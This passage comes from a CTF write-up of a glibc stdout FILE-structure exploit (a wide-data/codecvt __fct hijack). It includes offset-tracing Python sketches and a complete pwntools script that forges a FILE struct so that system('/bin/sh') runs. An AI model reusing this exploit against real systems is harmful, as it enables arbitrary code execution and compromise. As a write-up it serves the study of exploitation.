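To keep track of which stdout field ends up playing which role once the structures overlap, the offsets can be tabulated in Python. This is a sketch under assumptions: all offsets are the usual x86-64 glibc ones as I understand them (_IO_wide_data, struct _IO_codecvt and struct __gconv_step are not shown in this write-up), and the three base values are the ones the exploit writes into _wide_data, _codecvt and _markers, expressed relative to stdout.

```python
# Offsets of the FILE fields we can write, relative to stdout (assumed x86-64 layout).
FILE_OFF = {
    "_IO_read_end": 0x10,
    "_IO_read_base": 0x18,
    "_IO_write_base": 0x20,
    "_IO_write_ptr": 0x28,
    "_IO_write_end": 0x30,
    "_IO_save_base": 0x48,
    "_markers": 0x60,
}
FIELD_AT = {off: name for name, off in FILE_OFF.items()}

# Assumed offsets inside the overlapped structures.
WIDE_WRITE_BASE = 0x18      # struct _IO_wide_data: _IO_write_base
WIDE_WRITE_PTR = 0x20       # struct _IO_wide_data: _IO_write_ptr
CD_OUT_STEP = 0x38          # struct _IO_codecvt: __cd_out.step
STEP_SHLIB_HANDLE = 0x00    # struct __gconv_step: __shlib_handle
STEP_FCT = 0x28             # struct __gconv_step: __fct

# Values the exploit stores, relative to stdout.
wide_data = -0x8            # fp._wide_data = stdout - 0x8
codecvt = 0x28              # fp._codecvt   = stdout + 0x28
gs = 0x20                   # fp.markers    = stdout + 0x20

overlaps = {
    "_wide_data->_IO_write_base": FIELD_AT[wide_data + WIDE_WRITE_BASE],
    "_wide_data->_IO_write_ptr": FIELD_AT[wide_data + WIDE_WRITE_PTR],
    "codecvt->__cd_out.step (gs)": FIELD_AT[codecvt + CD_OUT_STEP],
    "gs->__shlib_handle": FIELD_AT[gs + STEP_SHLIB_HANDLE],
    "gs->__fct": FIELD_AT[gs + STEP_FCT],
    "rdi after add rdi, 0x10": FIELD_AT[gs + 0x10],
}

for role, field in overlaps.items():
    print(f"{role:30} -> stdout.{field}")
```

If these offsets hold, the table lines up with the field assignments in the exploit: _IO_write_base stays 0 so gs->__shlib_handle is NULL and PTR_DEMANGLE is skipped, _IO_save_base holds the gadget as gs->__fct, and gs + 0x10 is _IO_write_end, where the /bin/sh string lives.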

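So the question becomes how to make rcx point to system. Debugging shows that the computation of rcx is reversible and that it can be set to any value. To see how, trace backwards from jmp rcx to where the value comes from. It turns out that the source is lea rcx, [r12 + r13*4], executed in _IO_wdo_write; after rcx is set there, nothing modifies it until __fct runs.

Looking at that instruction, the obvious ways to control rcx are either r12 = system, r13 = 0, or r12 = 0, r13 = system // 4. Tracing r12 further shows that it is rsi, i.e. (_f)->_wide_data->_IO_write_base. I use that field later when overlapping the structures, so I went with r13 = system // 4. r13 is controllable too: it is rdx, i.e. (_f)->_wide_data->_IO_write_ptr - (_f)->_wide_data->_IO_write_base.

Setting it directly like that did not produce system, though. Tracing further up to see how rsi and rdx are actually passed in shows that rdx has been tampered with...

But it is clearly a reversible computation. YAAAY~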
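
My reading of the "tampering" is the element-count division that C performs when two wchar_t pointers are subtracted in _IO_do_flush (wchar_t is 4 bytes here), which the lea then undoes by scaling with 4. The sketch below models just that arithmetic; the system address is a hypothetical placeholder, and the helper name rcx_at_gadget is mine.

```python
WCHAR_SIZE = 4  # sizeof (wchar_t) on Linux x86-64


def rcx_at_gadget(wide_write_base: int, wide_write_ptr: int) -> int:
    """Model rdx = ptr - base (in wchar_t elements), then lea rcx, [r12 + r13*4]."""
    to_do = (wide_write_ptr - wide_write_base) // WCHAR_SIZE
    r12, r13 = wide_write_base, to_do
    return r12 + r13 * 4


system = 0x7FFFF7C58750     # hypothetical address, 4-byte aligned

naive = rcx_at_gadget(0, system // 4)           # storing system // 4 directly
fixed = rcx_at_gadget(0, system // 0x4 << 0x2)  # value used in the exploit

print(hex(naive), hex(fixed), fixed == system)
```

Under this model, storing system // 4 in the field gets divided once more and misses the target, while storing system // 0x4 << 0x2 (that is, system with its two low bits cleared) survives the divide-then-scale round trip, provided _wide_data->_IO_write_base is 0 and system is 4-byte aligned.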

Exploit#

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    ROP,
    FileStructure,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./main_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc
rop = ROP(libc)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"stdout : ")
    stdout = int(target.recvline(), 16)
    libc.address = stdout - libc.sym["_IO_2_1_stdout_"]
    add_rdi_0x10_jmp_rcx = libc.address + 0x000000000017D690
    system = libc.sym["system"]

    fp = FileStructure(null=stdout + 0x1260)
    fp.flags = 0x8
    fp.unknown2 = flat(
        {
            0x18: 0x1,  # fp->_mode
        },
        filler=b"\x00",
    )
    fp._IO_write_ptr = 1
    fp._IO_write_base = 0
    fp._wide_data = stdout - 0x8
    fp._codecvt = stdout + 0x28  # codecvt
    fp._IO_save_end = stdout + 0x8
    fp._IO_read_base = system // 0x4 << 0x2  # rdx
    fp.markers = stdout + 0x20  # gs->__shlib_handle
    fp._IO_save_base = add_rdi_0x10_jmp_rcx  # gs->__fct
    fp._IO_write_end = b"/bin/sh\x00"

    raw_input("DEBUG")
    target.send(bytes(fp))

    target.interactive()


if __name__ == "__main__":
    main()

Flag#

Reproduced after the event.